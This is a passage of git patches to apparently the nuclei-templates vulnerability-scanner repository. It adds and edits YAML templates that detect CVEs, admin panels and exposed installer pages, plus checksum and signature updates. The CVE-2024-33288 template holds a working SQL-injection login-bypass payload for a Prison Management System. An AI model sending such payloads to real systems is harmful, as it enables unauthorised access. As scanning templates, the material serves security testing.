http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 @@ -8539,7 +8540,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4ade96c1c0d1f0240c55940d0e2e01261f255a0f +templates-checksum.txt:52c15cdd3f388704c51a24ad318ac10dae5956da wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bafd9ba7b5fe2822f544381b02efe8581b0e7f2d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 17 May 2024 07:39:59 +0000 Subject: [PATCH 1115/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6900fcf26b..37fdd42f29 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -32,6 +32,7 @@ on: - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/boa-web-server.yaml' From 08c3dcf3aa0da178acaa5f29063a7af69de6aa75 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 17 May 2024 07:40:59 +0000 Subject: [PATCH 1116/1768] Auto Template Signing [Fri May 17 07:40:59 UTC 2024] :robot: --- http/misconfiguration/installer/trilium-notes-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/trilium-notes-installer.yaml b/http/misconfiguration/installer/trilium-notes-installer.yaml index df2153bb7c..1fbdd2c816 100644 --- a/http/misconfiguration/installer/trilium-notes-installer.yaml +++ b/http/misconfiguration/installer/trilium-notes-installer.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100aaaf43c91cfd2dcdc38160d6631d8871869948bad862a5dde686d95fabb04759022100abea2219d427e33b80feaeefc1134e8d6aaaf9ab575124f57ac68dcad1575d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 78513d5e9722b7f054ad5272037fcc03ec411cdd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 17 May 2024 14:43:28 +0530 Subject: [PATCH 1117/1768] minor-update --- http/cves/2023/CVE-2023-6065.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index dc145e56a6..18d4cec997 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -6,21 +6,25 @@ info: severity: medium description: | The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code + remediation: Fixed in 3.4.2.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-6065 - https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5 + - https://wordpress.org/plugins/quttera-web-malware-scanner/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6065 epss-score: 0.00046 - epss-percentile: 0.16179 + epss-percentile: 0.16199 cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: quttera product: quttera_web_malware_scanner framework: wordpress - tags: wpscan,cve2023,wp-plugin,quttera + tags: cve,cve2023,wp-plugin,quttera,wpscan, http: - method: GET @@ -30,13 +34,18 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Website Malware Scan Report" - "Scanned Website" - "Scan type" - part: body condition: and + - type: word + part: header + words: + - "text/plain" + - type: status status: - 200 From 56721132b320d52c2c1cda7a21f2ac49cf5c17a1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 17 May 2024 14:46:10 +0530 Subject: [PATCH 1118/1768] minor update --- http/cves/2024/CVE-2024-33288.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 581e8dd222..0d7dc9b9f7 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -1,13 +1,15 @@ id: CVE-2024-33288 + info: name: Prison Management System - SQL Injection Authentication Bypass author: Kazgangap severity: high - description: Sql injection vulnerability was found on the login page in Prison Management System + description: | + Sql injection vulnerability was found on the login page in Prison Management System reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html - tags: cms,cve2024,sqli + tags: cve,cve2024,cms,sqli http: - raw: @@ -16,7 +18,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - txtusername=admin%27+or+%271%27+%3D%271&txtpassword=nuclei&btnlogin= + txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin= - | GET /Admin/index.php HTTP/1.1 @@ -31,4 +33,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From b5b82da8d5821f2ab800e4e59fba273b65a691be Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 17 May 2024 14:50:04 +0530 Subject: [PATCH 1119/1768] minor update --- http/cves/2024/CVE-2024-33288.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 0d7dc9b9f7..23f85208d8 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -9,6 +9,10 @@ info: reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html + metadata: + verified: true + max-request: 2 + shodan-query: title:"Prison Management System" tags: cve,cve2024,cms,sqli http: @@ -30,6 +34,8 @@ http: words: - "<p>Change Password</p>" - "<p>Logout</p>" + - "Admin Dashboard | Prison Management system" + condition: and - type: status status: From ac967a09938beb5b63190f499bec7d27d5a032ae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 18 May 2024 04:49:51 +0530 Subject: [PATCH 1120/1768] minor update --- .../vrealize-hyperic-login-panel.yaml | 26 ++++++++++--------- 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index eb56e21586..d8fc286fe9 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -1,30 +1,32 @@ -id: vrealize-hyperic-login-panel +id: vrealize-hyperic-panel -info: +info: name: vRealize Hyperic Login Panel - Detect - author: Charles D. + author: Charles D severity: info - description: vRealize Hyperic login panel was detected - classification: + description: | + vRealize Hyperic login panel was detected + classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"Sign In - Hyperic" - tags: login,panel,vrealize-hyperic + verified: true + tags: login,panel,vrealize,hyperic http: - method: GET - path: + path: - '{{BaseURL}}/app/login' matchers-condition: and - matchers: + matchers: - type: word - words: - - "Sign In - Hyperic" part: body - + words: + - "Sign In - Hyperic" + - type: status status: - - 200 \ No newline at end of file + - 200 From 40937f3702514d2a299acdf28e44bff08751f599 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 19 May 2024 15:47:40 -0300 Subject: [PATCH 1121/1768] Create sparklighter-detect.yaml This nuclei template detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. --- http/technologies/sparklighter-detect.yaml | 27 ++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/technologies/sparklighter-detect.yaml diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml new file mode 100644 index 0000000000..879326d922 --- /dev/null +++ b/http/technologies/sparklighter-detect.yaml @@ -0,0 +1,27 @@ +id: sparklighter-detect + +info: + name: Spark Lighter Detection + author: icarot + severity: info + description: This nuclei template detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. + classification: + cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* + metadata: + max-request: 5 + vendor: lighter + product: spark_lighter_server + category: productivity + tags: tech,lighter,spark,detect + +requests: + - method: GET + path: + - "{{BaseURL}}/lighter/api" + - "{{BaseURL}}/lighter/batches" + - "{{BaseURL}}/lighter/sessions" + + matchers: + - type: status + status: + - 200 From 392c43a17e9bcbb98ce4facf98378b9901b473a5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 20 May 2024 03:50:34 +0000 Subject: [PATCH 1123/1768] Auto Generated Templates Checksum [Mon May 20 03:50:34 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7ea32eef24..c50f4a61a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2534,7 +2534,7 @@ http/cves/2022/CVE-2022-2219.yaml:f7b399fbf13b315ba3572bb95e8a517605780ccc http/cves/2022/CVE-2022-22242.yaml:b436f4fa38b41e393a70c271ce5808da14ca1200 http/cves/2022/CVE-2022-22536.yaml:2a50caf1a9f68f3369e917f3bb7f1d8e6b65b6d8 http/cves/2022/CVE-2022-22733.yaml:89003df5b937b3ab5ca97bea819a242ba1f8fbee -http/cves/2022/CVE-2022-22897.yaml:d3cf66d537cb79460a1ac71756e6f04915bec05c +http/cves/2022/CVE-2022-22897.yaml:950280f14d1635b6c9c90c391543df7d5358c9ac http/cves/2022/CVE-2022-2290.yaml:fa4cd065d732bf98911b59c6654a606b08743383 http/cves/2022/CVE-2022-22947.yaml:eb9d29cf2146e3457d9e38b5c4f1bdd37b49f9dc http/cves/2022/CVE-2022-22954.yaml:7fc1b436de35daea85136a6ad03332cc25cf27e4 @@ -3177,7 +3177,7 @@ http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 +http/cves/2023/CVE-2023-46347.yaml:dd09061e7e6da8f7b1a2804140fd6b019576d0f2 http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c @@ -5473,7 +5473,7 @@ http/misconfiguration/installer/tasmota-install.yaml:f77cc6de67828f45e5d0e528f77 http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 -http/misconfiguration/installer/trilium-notes-installer.yaml:30f3e838a3e50cf800ac21ebb8c33cbad2b8d7f6 +http/misconfiguration/installer/trilium-notes-installer.yaml:c3bc11c9c011dd659ca6af6d6ddbf4907495d69e http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 @@ -8540,7 +8540,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:52c15cdd3f388704c51a24ad318ac10dae5956da +templates-checksum.txt:5468afe63e9cb7d020875f12c43a0fb8cf98f91d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7f8961f6ff6da4ddcf2387c2ce743b2ff2056a93 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 20 May 2024 03:52:22 +0000 Subject: [PATCH 1124/1768] Auto Template Signing [Mon May 20 03:52:22 UTC 2024] :robot: --- http/cves/2022/CVE-2022-22897.yaml | 1 + http/cves/2023/CVE-2023-46347.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 3be9b98bc9..d399f50761 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -87,3 +87,4 @@ http: group: 1 regex: - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>" +# digest: 4b0a00483046022100fa886b63f46880ebc3ac311badf4173457c77333ee6c3119602d1ae1906343d6022100b40e5474b7dee7644024669adae67a822b8dd7a5e7d62b87095e51ee170e44c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 257b83cf73..53c778381e 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ba7f8d681eec29e6dd0682484b99bef70ea6763f14489f9b94b59485933301e102202d939b5e05c4199a2ae937c418c2dd3947f86b5a14d3ea6ac0fc0defe7065e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5721c96bc02845ab7954abb638f11391ba88cfe4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 20 May 2024 10:01:23 +0530 Subject: [PATCH 1125/1768] Create ids-skills-installer.yaml --- .../installer/ids-skills-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/ids-skills-installer.yaml diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml new file mode 100644 index 0000000000..38d61998d8 --- /dev/null +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -0,0 +1,29 @@ +id: ids-skills-installer + +info: + name: IDP Skills Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of an IDS Skills Installer page. + metadata: + verified: true + max-request: 1 + shodan-query: html:"IDP Skills Installer" + tags: install,ids,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/#/install/main" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>IDP Skills Installer" + + - type: status + status: + - 200 From e9c7e33f73e3d752c6cd715282a1a5cec004add7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 10:13:36 +0530 Subject: [PATCH 1126/1768] Create xbackbone-installer.yaml --- .../installer/xbackbone-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/xbackbone-installer.yaml diff --git a/http/misconfiguration/installer/xbackbone-installer.yaml b/http/misconfiguration/installer/xbackbone-installer.yaml new file mode 100644 index 0000000000..fa5217e3ca --- /dev/null +++ b/http/misconfiguration/installer/xbackbone-installer.yaml @@ -0,0 +1,29 @@ +id: xbackbone-installer + +info: + name: XBackBone Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a XBackBone Installer. + metadata: + verified: true + max-request: 1 + shodan-query: html:"XBackBone Installer" + tags: install,xbackbone,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "XBackBone Installer" + + - type: status + status: + - 200 From 73d55b3cd3a852c62ab76822d1e80ef711204d8c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 10:18:21 +0530 Subject: [PATCH 1127/1768] Create growi-installer.yaml --- .../installer/growi-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/growi-installer.yaml diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml new file mode 100644 index 0000000000..905628e1c0 --- /dev/null +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -0,0 +1,29 @@ +id: growi-installer + +info: + name: GROWI Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a GROWI Installer. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Installer - GROWI" + tags: install,growi,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/installer" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Installer - GROWI" + + - type: status + status: + - 200 From b8164729676d6fae9a1aea2bc417fe452df1c8f4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 11:45:39 +0530 Subject: [PATCH 1128/1768] Create easy-viserlabs-installer.yaml --- .../installer/easy-viserlabs-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/easy-viserlabs-installer.yaml diff --git a/http/misconfiguration/installer/easy-viserlabs-installer.yaml b/http/misconfiguration/installer/easy-viserlabs-installer.yaml new file mode 100644 index 0000000000..2aea23abde --- /dev/null +++ b/http/misconfiguration/installer/easy-viserlabs-installer.yaml @@ -0,0 +1,29 @@ +id: easy-viserlabs-installer + +info: + name: Easy Installer by ViserLab - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Easy Installer by ViserLab. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Easy Installer by ViserLab" + tags: install,easy,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Easy Installer by ViserLab" + + - type: status + status: + - 200 From 9485b0bc31f6150918cacf53a5120ea6a07c6901 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 12:21:30 +0530 Subject: [PATCH 1129/1768] Create openfire-setup.yaml --- .../installer/openfire-setup.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/openfire-setup.yaml diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml new file mode 100644 index 0000000000..95d42298c4 --- /dev/null +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -0,0 +1,29 @@ +id: openfire-setup + +info: + name: Openfire Setup - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Openfire Setup Page. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Welcome to Openfire Setup" + tags: install,openfire,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/setup/index.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Openfire Setup" + + - type: status + status: + - 200 From b8d5f920a083a10fc3e8433c32e6fd0c00636b1c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 13:47:42 +0530 Subject: [PATCH 1130/1768] Create wiki-js-installer.yaml --- .../installer/wiki-js-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/wiki-js-installer.yaml diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml new file mode 100644 index 0000000000..c6aa3db99f --- /dev/null +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -0,0 +1,29 @@ +id: wiki-js-installer + +info: + name: Wiki.js Setup - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Wiki.js Setup Page. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Wiki.js Setup" + tags: install,openfire,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Wiki.js Setup" + + - type: status + status: + - 200 From a1947c8784ec95d390bcfd7901c96338cfb1344b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 13:48:46 +0530 Subject: [PATCH 1131/1768] update --- http/misconfiguration/installer/wiki-js-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index c6aa3db99f..71f619e282 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Wiki.js Setup" - tags: install,openfire,exposure,misconfig + tags: install,wiki-js,exposure,misconfig http: - method: GET From 683e09158742e7375257592d4c0a4696dbdf61fc Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 11:48:27 +0200 Subject: [PATCH 1132/1768] Add files via upload --- .../microfocus-admin-server.yaml | 31 +++++++++++++------ 1 file changed, 21 insertions(+), 10 deletions(-) diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index d0317d8a0b..a3127e0a6b 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -2,7 +2,7 @@ id: microfocus-admin-server info: name: Micro Focus Enterprise Server Admin Panel - Detect - author: theabhinavgaur + author: theabhinavgaur,righettod severity: info description: Micro Focus Enterprise Server Admin panel was detected. classification: @@ -21,15 +21,26 @@ http: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/nps/servlet/portalservice" + - "{{BaseURL}}/nds" + - "{{BaseURL}}/_LOGIN_SERVER_" + + stop-at-first-match: true + + redirects: true + max-redirects: 2 - matchers-condition: and matchers: - - type: word - part: header - words: - - "Micro Focus DSD" + - type: dsl + dsl: + - 'status_code == 200 && contains(to_lower(header), "micro focus dsd")' + - 'status_code == 200 && contains_any(to_lower(body), "micro focus imanager", "micro focus imonitor", "micro focus remote manager", "micro focus open enterprise server")' + condition: or - - type: status - status: - - 200 -# digest: 4a0a004730450220434535888e9d2c7013c1604e095f8495b8b77f8f89b5dcee304bc4053c58c9d8022100ec370d625fc73d009cc2b2e158d64bf5b44186713c098461bbbabb34482fb73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Micro\s+Focus\s+Open\s+Enterprise\s+Server\s+([A-Z0-9\s]+)' + - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' \ No newline at end of file From 2104f6a7966113fa9b6f42ab3f1a6fbb11a7f868 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 17:08:18 +0200 Subject: [PATCH 1133/1768] Add files via upload --- http/exposed-panels/microfocus-vibe-panel.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index ce86900f15..712bf493f2 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -2,7 +2,7 @@ id: microfocus-vibe-panel info: name: Micro Focus Vibe Login Panel - Detect - author: ritikchaddha + author: ritikchaddha,righettod severity: info description: Micro Focus Vibe login panel was detected. classification: @@ -37,4 +37,10 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5cade6702eb0c2e91f23f81888a8c1b56b93f12d127fd6813d54654f2af7cae022100981ff04a3c6f182ff0ae8238cc822826f214f112ee057c36829c3d16d62cb583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Copyright\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file From 65486eb5cc10618cfcf77911d9b5881e03d40716 Mon Sep 17 00:00:00 2001 From: dcruzec Date: Mon, 20 May 2024 11:56:42 -0400 Subject: [PATCH 1134/1768] osnexus-quantastor-management-console --- ...osnexus-quantastor-management-console.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/osnexus-quantastor-management-console.yaml diff --git a/http/exposed-panels/osnexus-quantastor-management-console.yaml b/http/exposed-panels/osnexus-quantastor-management-console.yaml new file mode 100644 index 0000000000..b1246ca697 --- /dev/null +++ b/http/exposed-panels/osnexus-quantastor-management-console.yaml @@ -0,0 +1,37 @@ +id: osnexus-quantastor-management-console + +info: + name: OSNEXUS QuantaStor Management Console - Detect + author: Charles D + severity: info + description: OSNEXUS QuantaStor Management Console was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"OS NEXUS QuantaStor Manager" + tags: management-console,login,osnexus-quantastor,osnexus + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "OS NEXUS QuantaStor Manager" + part: body + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "'name="qsversion" content="([^"]+)"'" From 39d289cf47da49f95e4a71d9645bcddb1dc5d9cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 17:12:07 +0000 Subject: [PATCH 1135/1768] Auto Generated Templates Checksum [Mon May 20 17:12:07 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c50f4a61a9..38dded005c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2534,7 +2534,7 @@ http/cves/2022/CVE-2022-2219.yaml:f7b399fbf13b315ba3572bb95e8a517605780ccc http/cves/2022/CVE-2022-22242.yaml:b436f4fa38b41e393a70c271ce5808da14ca1200 http/cves/2022/CVE-2022-22536.yaml:2a50caf1a9f68f3369e917f3bb7f1d8e6b65b6d8 http/cves/2022/CVE-2022-22733.yaml:89003df5b937b3ab5ca97bea819a242ba1f8fbee -http/cves/2022/CVE-2022-22897.yaml:950280f14d1635b6c9c90c391543df7d5358c9ac +http/cves/2022/CVE-2022-22897.yaml:da96a058c0b51cabc86662041dbebd679ebcaaed http/cves/2022/CVE-2022-2290.yaml:fa4cd065d732bf98911b59c6654a606b08743383 http/cves/2022/CVE-2022-22947.yaml:eb9d29cf2146e3457d9e38b5c4f1bdd37b49f9dc http/cves/2022/CVE-2022-22954.yaml:7fc1b436de35daea85136a6ad03332cc25cf27e4 @@ -3177,7 +3177,7 @@ http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:dd09061e7e6da8f7b1a2804140fd6b019576d0f2 +http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c @@ -3293,6 +3293,7 @@ http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d 